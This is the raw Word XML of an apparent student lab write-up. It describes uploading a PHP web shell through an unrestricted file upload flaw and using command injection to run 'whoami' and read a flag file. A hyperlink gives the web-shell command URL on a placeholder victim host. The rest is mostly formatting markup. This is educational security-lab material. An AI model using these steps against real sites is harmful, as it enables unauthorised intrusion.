    <w:p w14:paraId="1DBD91A8" w14:textId="77777777" w:rsidR="00676E2C" w:rsidRDefault="00676E2C" w:rsidP="004F1182"/>
    <w:p w14:paraId="15FB04FB" w14:textId="77777777" w:rsidR="00975411" w:rsidRDefault="00975411" w:rsidP="00975411">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3671145F" w14:textId="42D8E5F7" w:rsidR="009667DA" w:rsidRDefault="009667DA" w:rsidP="004F1182">
      <w:r>
        <w:t xml:space="preserve">The second task is to use a web shell to exploit the unrestricted file upload vulnerability and get a shell. </w:t>
      </w:r>
      <w:r w:rsidR="00EF024A">
        <w:t xml:space="preserve">I created the </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00EF024A">
        <w:t>shell.php</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00EF024A">
        <w:t xml:space="preserve"> file first and saved it to the files.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0BAD4668" w14:textId="77777777" w:rsidR="00EF024A" w:rsidRDefault="00EF024A" w:rsidP="004F1182"/>
    <w:p w14:paraId="7C570954" w14:textId="7CCFF7F4" w:rsidR="00EF024A" w:rsidRDefault="00EF024A" w:rsidP="004F1182">
      <w:r w:rsidRPr="00EF024A">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="51684AA5" wp14:editId="59E8CAF2">
            <wp:extent cx="3048000" cy="1331899"/>
            <wp:effectExtent l="0" t="0" r="0" b="1905"/>
            <wp:docPr id="187140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02098" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId10"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="3056098" cy="1335438"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="75794FC5" w14:textId="77777777" w:rsidR="00EF024A" w:rsidRDefault="00EF024A" w:rsidP="004F1182"/>
    <w:p w14:paraId="21347F79" w14:textId="527F58B0" w:rsidR="00EF024A" w:rsidRDefault="00EF024A" w:rsidP="004F1182">
      <w:r>
        <w:t xml:space="preserve">Then I accessed the vulnerable website which allowed unrestricted file </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>upload</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve"> so I uploaded the </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>shell.php</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> file</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01C23F39" w14:textId="77777777" w:rsidR="00EF024A" w:rsidRDefault="00EF024A" w:rsidP="004F1182"/>
    <w:p w14:paraId="5A9B9D9B" w14:textId="44761A1A" w:rsidR="00EF024A" w:rsidRDefault="00EF024A" w:rsidP="004F1182">
      <w:r w:rsidRPr="00EF024A">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="01D43AE1" wp14:editId="5914226E">
            <wp:extent cx="3521710" cy="2100598"/>
            <wp:effectExtent l="0" t="0" r="2540" b="0"/>
            <wp:docPr id="82464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42860" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId11"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="3528669" cy="2104749"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E3EA0AC" w14:textId="77777777" w:rsidR="00EF024A" w:rsidRDefault="00EF024A" w:rsidP="004F1182"/>
    <w:p w14:paraId="2C082609" w14:textId="4495A4DA" w:rsidR="00EF024A" w:rsidRDefault="00EF024A" w:rsidP="004F1182">
      <w:r>
        <w:t>Now I could use command injection in the URL to see who I was</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="631D0439" w14:textId="77777777" w:rsidR="00EF024A" w:rsidRDefault="00EF024A" w:rsidP="004F1182"/>
    <w:p w14:paraId="5A24B164" w14:textId="59AFEF7D" w:rsidR="00EF024A" w:rsidRDefault="00EF024A" w:rsidP="004F1182">
      <w:r w:rsidRPr="00EF024A">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="4D83870C" wp14:editId="6B222928">
            <wp:extent cx="6082030" cy="802005"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="70367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75623" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId12"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="6082030" cy="802005"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D36F35D" w14:textId="77777777" w:rsidR="00EF024A" w:rsidRDefault="00EF024A" w:rsidP="004F1182"/>
    <w:p w14:paraId="6DE6E8EB" w14:textId="77777777" w:rsidR="00EF024A" w:rsidRDefault="00EF024A" w:rsidP="004F1182"/>
    <w:p w14:paraId="7EA184F1" w14:textId="4151F21B" w:rsidR="00EF024A" w:rsidRDefault="00EF024A" w:rsidP="004F1182">
      <w:r>
        <w:t>Finally, I was able to use command injection to view the flag.txt file and find the flag</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A856047" w14:textId="77777777" w:rsidR="00EF024A" w:rsidRDefault="00EF024A" w:rsidP="004F1182"/>
    <w:p w14:paraId="47D7EE9F" w14:textId="74F9590C" w:rsidR="00EF024A" w:rsidRDefault="00EF024A" w:rsidP="004F1182">
      <w:r w:rsidRPr="00EF024A">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="1CDA04CB" wp14:editId="6D9EF643">
            <wp:extent cx="6082030" cy="809625"/>
            <wp:effectExtent l="0" t="0" r="0" b="9525"/>
            <wp:docPr id="6730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8571" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId13"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="6082030" cy="809625"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="11D9F373" w14:textId="77777777" w:rsidR="009667DA" w:rsidRDefault="009667DA" w:rsidP="004F1182"/>
    <w:p w14:paraId="6BDAAE58" w14:textId="77777777" w:rsidR="00F96E69" w:rsidRDefault="00F96E69" w:rsidP="004F1182"/>
    <w:p w14:paraId="54F83B9A" w14:textId="6510FDEA" w:rsidR="004F1182" w:rsidRDefault="004F1182" w:rsidP="004F1182">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:r>
        <w:t>4. What I’ve learned</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44070D79" w14:textId="77777777" w:rsidR="002E668C" w:rsidRDefault="002E668C" w:rsidP="002E668C"/>
    <w:p w14:paraId="72765E9E" w14:textId="797E1162" w:rsidR="00975411" w:rsidRDefault="00975411" w:rsidP="00975411">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>What shells are in more detail</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78D38E18" w14:textId="7E4979AD" w:rsidR="00975411" w:rsidRDefault="00975411" w:rsidP="00975411">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">The different kind of shells – reverse, bind and web </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A63558B" w14:textId="3408EAA2" w:rsidR="00975411" w:rsidRPr="002E668C" w:rsidRDefault="00975411" w:rsidP="00975411">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Practical experience of using a reverse shell </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>and also</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve"> a web shell </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="032F0EF9" w14:textId="77777777" w:rsidR="001E67DF" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="416" w:line="259" w:lineRule="auto"/>
        <w:ind w:left="0" w:right="-60" w:firstLine="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <mc:AlternateContent>
          <mc:Choice Requires="wpg">
            <w:drawing>
              <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="149184F1" wp14:editId="2DA5D37D">
                <wp:extent cx="6120000" cy="9525"/>
                <wp:effectExtent l="0" t="0" r="0" b="0"/>
                <wp:docPr id="1638" name="Group 163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4" name="Shape 1874"/>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8" style="width:481.89pt;height:0.75pt;mso-position-horizontal-relative:char;mso-position-vertical-relative:line" coordsize="61200,95">
                <v:shape id="Shape 1875"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EDEF358" w14:textId="7680CCA4" w:rsidR="001E67DF" w:rsidRDefault="001E67DF">
      <w:pPr>
        <w:spacing w:line="259" w:lineRule="auto"/>
        <w:ind w:left="2703" w:firstLine="0"/>
      </w:pP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 w15:restartNumberingAfterBreak="0">
    <w:nsid w:val="279F2F01"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="ED8237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3"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num w:numId="1" w16cid:durableId="1823811405">
    <w:abstractNumId w:val="3"/>
  </w:num>
  <w:num w:numId="2" w16cid:durableId="1402409293">
    <w:abstractNumId w:val="2"/>
  </w:num>
  <w:num w:numId="3" w16cid:durableId="832569701">
    <w:abstractNumId w:val="0"/>
  </w:num>
  <w:num w:numId="4" w16cid:durableId="1518883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562BA"/>
    <w:rsid w:val="000D0610"/>
    <w:rsid w:val="000D1B55"/>
    <w:rsid w:val="0012638C"/>
    <w:rsid w:val="001E67DF"/>
    <w:rsid w:val="002E668C"/>
    <w:rsid w:val="00345369"/>
    <w:rsid w:val="004D019F"/>
    <w:rsid w:val="004F1182"/>
    <w:rsid w:val="00676E2C"/>
    <w:rsid w:val="006D37FA"/>
    <w:rsid w:val="007313D5"/>
    <w:rsid w:val="00877616"/>
    <w:rsid w:val="009667DA"/>
    <w:rsid w:val="00975411"/>
    <w:rsid w:val="00A80858"/>
    <w:rsid w:val="00BF1E00"/>
    <w:rsid w:val="00D10606"/>
    <w:rsid w:val="00D52052"/>
    <w:rsid w:val="00D93C30"/>
    <w:rsid w:val="00E82030"/>
    <w:rsid w:val="00E907B5"/>
    <w:rsid w:val="00EF024A"/>
    <w:rsid w:val="00EF546C"/>
    <w:rsid w:val="00F36B4A"/>
    <w:rsid w:val="00F62E28"/>
    <w:rsid w:val="00F96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paragraph" w:styleId="Heading3">
    <w:name w:val="heading 3"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="Normal"/>
    <w:link w:val="Heading3Char"/>
    <w:uiPriority w:val="9"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:qFormat/>
    <w:rsid w:val="009667DA"/>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562BA"/>
    <w:pPr>
      <w:ind w:left="720"/>
      <w:contextualSpacing/>
    </w:pPr>
  </w:style>
  <w:style w:type="character" w:styleId="Hyperlink">
    <w:name w:val="Hyperlink"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:uiPriority w:val="99"/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="00E907B5"/>
    <w:rPr>
      <w:color w:val="467886" w:themeColor="hyperlink"/>
      <w:u w:val="single"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="UnresolvedMention">
    <w:name w:val="Unresolved Mention"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="00E907B5"/>
    <w:rPr>
      <w:color w:val="605E5C"/>
      <w:shd w:val="clear" w:color="auto" w:fill="E1DFDD"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="Heading3Char">
    <w:name w:val="Heading 3 Char"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:link w:val="Heading3"/>
    <w:uiPriority w:val="9"/>
    <w:semiHidden/>
    <w:rsid w:val="009667DA"/>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victim.com/uploads/shell.php?cmd=whoami" TargetMode="External"/><Relationship Id="rId11" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image5.png"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://victim.com/uploads/shell.php"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4</Pages>
  <Words>684</Words>
  <Characters>3901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11</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2026-05-12T16:45:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2026-05-28T14:15:00Z</dcterms:modified>
</cp:coreProperties>
</file>